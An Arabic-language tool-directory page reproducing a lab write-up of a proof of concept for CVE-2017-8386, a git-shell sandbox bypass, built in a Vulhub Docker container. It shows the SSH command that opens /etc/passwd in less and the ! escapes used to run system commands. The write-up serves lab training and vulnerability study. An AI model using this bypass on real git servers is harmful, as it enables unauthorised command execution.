Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WHS3_vulhub — PoC لثغرة تجاوز الحماية الصندوقية Git-Shell CVE-2017-8386. | Kitploit
أدوات/GitHubGitHub/suz1n/whs3_vulhub
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubsuz1n/whs3_vulhub

WHS3_vulhub

PoC لثغرة تجاوز الحماية الصندوقية Git-Shell CVE-2017-8386.

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-8386: تجاوز حماية بيئة git-shell المؤدي إلى تنفيذ أوامر (RCE) - إثبات المفهوم

جونغسو جين (@suz1n)

نظرة عامة

Git-shell هو بيئة تسمح فقط بتنفيذ أوامر git المحدودة عبر SSH. ولكن في إصدارات معينة من git-shell (مثل 2.12.2)، توجد ثغرة أمنية (CVE-2017-8386) تمكن من تجاوز الحماية sandbox باستخدام أمر less وتنفيذ أوامر النظام.

هذا التقرير يوثق إجراء إثبات المفهوم (PoC) لهذه الثغرة ويشرح الخطوات.

إعداد البيئة

الأدوات والإصدارات المستخدمة

  • Docker: 24.0.7
  • Docker-Compose: v2.34.0
  • نظام التشغيل المضيف: macOS
  • نظام التشغيل الهدف: Ubuntu 16.04 (داخل الحاوية)
  • إصدار Git: 2.12.2
  • خادم SSH

استنساخ مستودع Vulhub

git clone https://github.com/phith0n/vulhub.git

cd vulhub/git/CVE-2017-8386/ Image1

تكوين ملفي docker-compose.yml و Dockerfile

root@kitploit:~
• صورة أساسية Ubuntu 16.04
• تثبيت Git 2.12.2 من المصدر
• تثبيت وتشغيل خادم OpenSSH
• إعداد بيئة git-shell (إنشاء مستخدم git)

بناء الحاوية وتشغيلها

docker-compose build

docker-compose up -d

docker ps

root@kitploit:~
• التحقق من تشغيل الحاوية (git-shell-cve-2017-8386)

Image2

تسجيل مفتاح SSH وإعداد البيئة

root@kitploit:~
1. إنشاء ونسخ id_rsa.pub محلياً
2. الدخول إلى داخل الحاوية والتبديل إلى مستخدم git
3. تسجيل المفتاح العام في authorized_keys

docker exec -it git-shell-cve-2017-8386 /bin/bash

chsh -s /bin/bash git

su git

mkdir -p ~/.ssh

chmod 700 ~/.ssh

touch ~/.ssh/authorized_keys

chmod 600 ~/.ssh/authorized_keys

vim ~/.ssh/authorized_keys

Image3

تثبيت حزم إضافية

apt update

apt install less -y

apt install man-db -y

root@kitploit:~
• تم تثبيت حزمتي less و man لتنفيذ PoC

خطوات إثبات المفهوم (PoC)

اتصال SSH عادي

ssh -p 3322 -i id_rsa -t [email protected] "less /etc/passwd"

• تم الدخول بنجاح إلى واجهة less

• يمكن تنفيذ أوامر النظام باستخدام أمر !

تنفيذ الأوامر (تجاوز الحماية)

• !id -> طباعة معرف المستخدم والمجموعة first_execute.png

• !whoami -> المستخدم الحالي (git)

• !uname -a -> طباعة معلومات نواة النظام

• !ls /home/git -> عرض قائمة الملفات في دليل git الرئيسي

التحليل

root@kitploit:~
• بيئة git-shell تمنع المستخدم من تنفيذ أوامر النظام.
• لكن باستخدام أمر `git-upload-archive --help` يمكن استدعاء less داخلياً.
• يدعم أمر less تنفيذ أوامر shell عبر خاصية !.
• وبالتالي، يمكن تجاوز حماية git-shell sandbox وتنفيذ أوامر عشوائية.

المراجع

• مدونة Insinuator: https://insinuator.net/2017/05/git-shell-bypass-by-abusing-less-cve-2017-8386/

• مستودع Vulhub على GitHub: https://github.com/phith0n/vulhub

رابط مستودع GitHub

https://github.com/suz1n/WHS3_vulhub

تنزيل الأداة